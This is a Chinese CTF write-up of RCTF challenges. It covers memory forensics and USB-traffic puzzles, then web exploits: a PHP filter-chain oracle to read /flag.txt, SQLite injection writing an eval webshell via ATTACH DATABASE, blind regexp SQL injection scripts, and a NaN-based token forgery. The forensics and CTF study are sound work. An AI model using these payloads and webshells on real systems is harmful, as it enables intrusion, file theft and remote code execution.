Misc

gogogo

考点:内存取证

得到 gogogo.raw 内存取证的题用volatility和AXIOM结合分析

AXIOM 分析存在云服务 但是百度网盘要密码

https://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw

发现访问过sqlite数据库 可以尝试提取数据库文件出来

结合 volatility 第一步先看 粘贴板

vol.py -f gogogo.raw --profile=Win7SP0x86 clipboard

有 cwqs 猜测可能是百度网盘密码

得到 pwn=?.zip 但是还有密码 缺少关键信息

提取 places.sqlite数据库文件

扫描:vol.py -f gogogo.raw --profile=Win7SP0x86 filescan |grep "places.sqlite"

提取sqlite文件

vol.py -f gogogo.raw --profile=Win7SP0x86 dumpfiles -Q 0x000000007f634f80 -D ./

打开 数据库文件 发现在moz_place 发现访问网址

访问 https://space.bilibili.com/3546644702301067

提示pwd=uid uid=3546644702301067

这个是压缩包密码

打开后为 flag.zip 和键盘流量lqld.pcapng

直接 usb流量一把梭

niuo ybufmefhui kjqillxdjwmi uizebuui

dvoo

udpn uibuui jqybdm vegeyisi

vemeuoll jxysgowodmnkderf dbmzfa hkhkdazi

zvjnybufme hkwjdeggma

na mimajqueviig

kyllda doqisl ba

pnynqrpn

qrxcxxzimu

输入法拼音双键联想 注意na mima

注意

na mimajqueviig 那密码就设置成

kyllda doqisl ba 快来打夺旗赛吧

"那密码就确定为，快来打夺旗赛吧"

密码是 kuailaidaduoqisaiba

打开直接就是flag

RCTF{wo_shen_me_dou_hui_zuo_de}

sec-image

考点: 光栅图

曾哥写过自动化工具一款CTFer专属的光栅图碰撞全自动化脚本

这个工具有两个参数 -x -y

-x XCOORDINATE 自动读取图片并尝试爆破横向光栅图

-y YCOORDINATE 自动读取图片并尝试爆破纵向光栅图

根据已知信息 flag RCTF{xxxxx}倒推找规律

flag0

-x R(T) C(F) 最明显的是一组的作为划分标准

-y 此时的2-1 是RC 2-2是TF2-1对应1,2位 2-2对应3,4位

flag1:{c4b

flag2:af0e

依次类推

但是难免有些图片 实在是模糊不清

这个时候就用stegsolve 辅助判断

RCTF{c4baf0eb-e5ca-543a-06d0-39d72325a0}

FindAHacker

内存取证 查看Desktop文件内容

vol.py -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile Win7SP1x64 filescan | grep "Desktop"

发现存在ida 逆向临时数据库

检查 进程

vol.py -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile Win7SP1x64 pslist

提取 内存文件

vol.py -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile Win7SP1x64 memdump -p 2172 -D ./

修改后缀位data用 gimp打开后

调了半天没有找到那一帧

不管了直接借用其他WP的图

不太懂逆向 xor数据后就是flag

mmm = [0x35,0x3f,0x4e,0x2b,0x56,0x6b,0x74,0x6a,0x5d,0x6d,0x6f,0x73,0x6c,0x77,0x38,0x68,0x59,0x6e,0x20,0x21,0x3c,0x71,0x4f,0x09,0x36,0x7d,0x55,0x72,0x51,0x32,0x27,0x66]

enc = [0x0c,0x0f,0x2b,0x48,0x6f,0x5d,0x46,0x53,0x64,0x59,0x59,0x4b,0x5f,0x47,0x5b,0x5b,0x6b,0x5f,0x15,0x16,0x5d,0x12,0x76,0x6b,0x07,0x1b,0x33,0x4a,0x67,0x07,0x11,0x0]

flag=[]

for i in range(len(mmm)):

flag.append(chr(mmm[i]^enc[i]))

flag=''.join(flag)

print("RCTF{"+flag+"}")

RCTF{90ec9629946830c32157ac9b1ff8656f}

Web

color

做了反调试 直接ctrl+F8 停用断点 或者直接手动禁用

当时写了个自动化找不同xpath的脚本(就是找色差)

from selenium import webdriver

from selenium.webdriver.common.by import By

from selenium.webdriver.support.ui import WebDriverWait

from selenium.webdriver.support import expected_conditions as EC

import time

driver = webdriver.Chrome()

driver.get('http://124.71.164.28:10088/')

time.sleep(60)

start_button = WebDriverWait(driver, 10).until(

EC.element_to_be_clickable((By.CLASS_NAME, 'play-btn'))

)

start_button.click()

i = 0

while True:

try:

i = i + 1

boxes = WebDriverWait(driver, 10).until(

EC.presence_of_all_elements_located((By.XPATH, '//*[@id="box"]/*'))

)

found = False

for i in range(len(boxes) - 1):

if boxes[i].get_attribute('style') != boxes[i + 1].get_attribute('style'):

if i + 2 < len(boxes) and boxes[i].get_attribute('style') != boxes[i + 2].get_attribute('style'):

boxes[i].click()

else:

boxes[i + 1].click()

found = True

break

if not found:

if len(boxes) > 1:

boxes[-1].click()

t2 = time.time()

except Exception as e:

print(f"An error occurred: { e}")

time.sleep(20)

continue

print("Done")

但是即使是自动化 也存在可见的延迟

当时做题时没有注意，认为是后端的延迟(但是实际是前端的)

不是只有60s吗 时间是减少的 可以让时间增加 使它逻辑相反

逆了下它关键的加密逻辑 但是想简化问题

const CryptoJS = require('crypto-js');

function _0x443f31(_0x1de1a8) {

var _0x1de1a8 = 'checkImage';

var _0x4b1cba = "88b4dbc541cd57f2d55398e9be3e61ae";

var _0xdc28e0 = "41cd57f2d55398e9";

return CryptoJS.AES.encrypt(_0x1de1a8, CryptoJS.enc.Utf8.parse(_0x4b1cba), {

iv: CryptoJS.enc.Utf8.parse(_0xdc28e0),

mode: CryptoJS.mode.CBC,

padding: CryptoJS.pad.Pkcs7

}).toString();

}

console.log(_0x443f31());

//xEt6B2i+YJdcrJ/RG3Ie4Q==

所以直接js逆向改变其代码逻辑

游戏时间不是只有60s 吗 令他时间增加不就行了

tick: function () {

if (this._pause) {

return undefined;

} else {

this.time++;

if (this.time < 6) {

_0x4b69a3.time.addClass("danger");

}

if(this.time>1200){

this.gameOver();

return;

}

if (this.time < 0) {

this.gameOver();

return;

} else {

_0x4b69a3.time.text(parseInt(this.time));

return;

}

}

修改代码逻辑 使时间增加 到1200 进入gameover结算即可

时间增加成功

结合自动化的脚本

现在就等1200s秒后就可以拿提示了

拿到路由/secr3tcolor.zip 可以得到源码

dockerfile中直接提示flag 在 /flag.txt中

就是已知flag的位置 要想办法读取文件

看看 game.php

else if($action === "checkImage"){

try {

$upload_image = file_get_contents($_FILES["image"]["tmp_name"]);

echo getimagesize($upload_image);

echo+文件处理流函数

直接考虑 php filter Oracle 测信道 任意文件读取

参考:https://xz.aliyun.com/t/12939

被影响的函数包含 getimagesize

https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py

简单改下poc即可 改变其 req函数

def req(s):

data = { "action": "xEt6B2i+YJdcrJ/RG3Ie4Q=="}

string_content = f"php://filter/{ s}/resource=/flag.txt"

files = { 'image': string_content}

res=requests.post('http://124.71.164.28:10088/final/game.php', data=data,files=files)

return 'Fatal' in res.text

注意一下原来的poc是通过 http状态码 500 判断测信道

但是实际上 只要 php 内存溢出了 就会有报错

Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 83886144 bytes) in /tmp/iconv.php on line 6

可以从其中顺便找个 关键词 作为判断的标准即可

比如我这里是用 Fatal

header头就是编码方式

可以根据 自己的需求 改它的poc即可

RCTF{Color_Col0r_C0lor}

赛后看了看其他WP 既然是前端做的延迟那么直接敲掉 delay就可以了

后自动化脚本也是可以的

但是试了一下不太可能 一秒如何跑8次左右 还要考虑网络本身和脚本的延迟 没有成功

proxy

考点 :sqlite注入

public function execMultiSQL($arysql){

try{

$this->dm_handler->beginTransaction();

foreach($arysql as $asql){

$result=$this->dm_handler->exec($asql);

}

#只要有一个报错 就会到catch块中不会commit提交数据真正改变数据库

$this->dm_handler->commit();

return TRUE;

}

catch(PDOException $exception) {

$this->dm_handler->rollBack();

return FALSE;

}

}

其实 这道就是考如何闭合sql语句 写到数据库中

$arysql[] = "INSERT OR REPLACE INTO CacheMain VALUES ('".$sess."', ".time().")";

$arysql[] = "INSERT INTO CacheDetail VALUES ('".$sess."', '".$BE."')";

#闭合方式:1');CREATE TABLE J1rrY (t TEXT);--+-

$arysql[] = "CREATE TABLE Cache_".$sess."_".$BE." (t TEXT)";

#直接将其嵌入到 SQL 语句

$arysql[] = "INSERT INTO Cache_".$sess."_".$BE." VALUES('".$ProxyObj->body."')";

$DbObj->execMultiSQL($arysql);

但是测试了非常久 最终 还是能同时闭合前面 但是绕不过最后一个

同时闭合所有sql语句 这个思路是看样子是走不通了

查找 sqlite教程 SQLite 事务（Transaction）发现存在COMMIT命令

https://www.runoob.com/sqlite/sqlite-transaction.html

COMMIT 命令

COMMIT 命令是用于把事务调用的更改保存到数据库中的事务命令。

COMMIT 命令把自上次 COMMIT 或 ROLLBACK 命令以来的所有事务保存到数据库。

COMMIT 命令的语法如下：

COMMIT;

or

END TRANSACTION;

居然可以无视报错直接提交COMMIT到数据库保存

结合sqlite注入写shell的文章 其中的poc一把梭就是

https://xz.aliyun.com/t/8627

');COMMIT;ATTACH DATABASE '/var/www/html/shell.php' AS shell;create TABLE shell.exp (payload text); insert INTO shell.exp (payload) VALUES ('<?php @eval($_POST["x"]); ?>');COMMIT;--+-

直接写shell是成功的

RCTF{ok_you_are_win_this_sql_game}

赛后看了看其他的WP 发现正解该是利用Proxy.php

$http .= $_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT'];

伪造$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT']

作为HTTP头传递

比赛时特别考虑过 但是没有内容就认为不是这个思路

但是没想到居然可以利用Proxy.php

的确可以拿到请求 以后就用nc判断了…

那么我们只需要闭合最后的sql语句即可

VALUES('".$ProxyObj->body."')";

其他前面的sql一定是闭合的

直接用先知的文章打payload，简单闭合就可以了

<?php

echo "');ATTACH DATABASE '/var/www/html/shell.php' AS shell;create TABLE shell.exp (payload text); insert INTO shell.exp (payload) VALUES ('<?php eval(\$_POST[1]); ?>');--+-";

?>

一个小问题:

如果我们访问poc.php返回

a');ATTACH DATABASE '/var/www/html/shell.php' AS shell;create TABLE shell.exp (payload text); insert INTO shell.exp (payload) VALUES ('');--

VALUES ('');的值为空 是没有写进去吗?

本地看了一下是写进去了

RCTF{ok_you_are_win_this_sql_game}

what_is_love

存在黑名单 要进行绕过

db.query(

"CREATE TABLE IF NOT EXISTS key1 (id INT AUTO_INCREMENT PRIMARY KEY,love_key VARCHAR(255) NOT NULL)"

);

db.query(

"INSERT INTO key1 (love_key) VALUES('RCTF{key1')"

//向 key1表中插入 love_key的值

存在表名 key1 字段为 love_key

黑名单相当于禁用了

/SELECT|CREATE|TABLE|DATABASE|IF|\(|\)|INSERT|UPDATE|DELETE|AND|OR|\.\./|\./|UNION|INTO|LOAD_FILE|OUTFILE|DUMPFILE|SUB|HEX|NOW|CURRENT_TIMESTAMP|GETDATE|SLEEP|SUBSTRING|MID|LEFT|RIGHT|ASCII|CHAR|REPEAT|REPLICATE|LIKE|%/gi

let res1 = `SELECT * FROM key1 WHERE love_key = '${ key1}'`;

db.query(`SELECT * FROM key1 WHERE love_key = '${ key1}'`, (err, results) => {

//很显然我们不知道love_key的具体值

if (err) {

res.send("error");

} else if (results.length > 0) {

res.send("success");//布尔盲注

} else {

res.send("wrong");

}

这是一道非常典型的布尔盲注

但是要注意的是 这道题将select过滤了 我们无法进行任何查询操作

但是 love_key 就是我们要求的第一段flag

完全可以直接 通过 正则匹配查询想要的数据 通过布尔盲注判断即可

flag 1 必然是RCTF开头的可以验证一下

通过正则匹配开头是 R 可以验证思路是正确的

编写脚步（注意 --+- 只能用于GET ）

import requests

url="http://1.94.13.174:10088/key1"

strs='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_ {}!@$%&()#'

flag=""

while True:

for i in strs:

data={ "key1":f"1' || love_key regexp binary '^{ flag+i}'#"}

res=requests.post(url=url,data=data)

if "success" in res.text:

flag+=i

print(flag)

但是同时 由于源码限制 key1.length > 52

RCTF{THE_FIRST_STEP 第一段flag不完全

直接倒着匹配flag 1

import requests

url="http://1.94.13.174:10088/key1"

strs='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_ {}!@%&()#'

flag=""

while True:

for i in strs:

#data={"key1":f"1' || love_key regexp binary '^{flag+i}'#"}

data={ "key1":f"1' || love_key regexp binary '{ i+flag}$'#"}

res=requests.post(url=url,data=data)

if "success" in res.text:

flag=i+flag

print(flag)

P_IS_TO_GET_TO_KNOW

flag 1就是 RCTF{THE_FIRST_STEP_IS_TO_GET_TO_KNOW

如果我们不按照它期望传入一个数字 而是字符串

userInfo.love_time = Number(love_time); 将返回 NAN

在此时的加密中

const createToken = (userinfo) => {

const saltedSecret =

parseInt(Buffer.from(secret).readBigUInt64BE()) +

parseInt(userinfo.love_time);

const data = JSON.stringify(userinfo);

return (

Buffer.from(data).toString("base64") + "." + hash(`${ data}:${ saltedSecret}`)

);

};

直接和随机生成的secret 拼接

那么此时的

${data}:{"username":"J1rrY","love_time":null,"have_lovers":false}

${saltedSecret}:secret+NAN

尝试输出此时的 saltedSecret

const crypto = require("crypto");

const secret = crypto.randomBytes(128);

love_time=null

const saltedSecret =

parseInt(Buffer.from(secret).readBigUInt64BE()) +

parseInt(love_time);

console.log(saltedSecret);

会发现始终是一个定值 NaN

这说明一个事实 只要 "love_time"为 null saltedSecret就一定是 NaN 是一个定值

已知加密逻辑直接伪造加密就是了

const crypto = require("crypto");

const secret = crypto.randomBytes(128);

const hash = (data) => crypto.createHash("sha256").update(data).digest("hex");

userinfo={ "username":"J1rrY","love_time":null,"have_lovers":true}

const saltedSecret =NaN;

console.log(saltedSecret)

const data = JSON.stringify(userinfo);

console.log(data)

console.log(Buffer.from(data).toString("base64") + "." + hash(`${ data}:${ saltedSecret}`))

RCTF{THE_FIRST_STEP_IS_TO_GET_TO_KNOW_AND_GIVE_A_10000_YEAR_COMMITMENT_FOR_LOVE}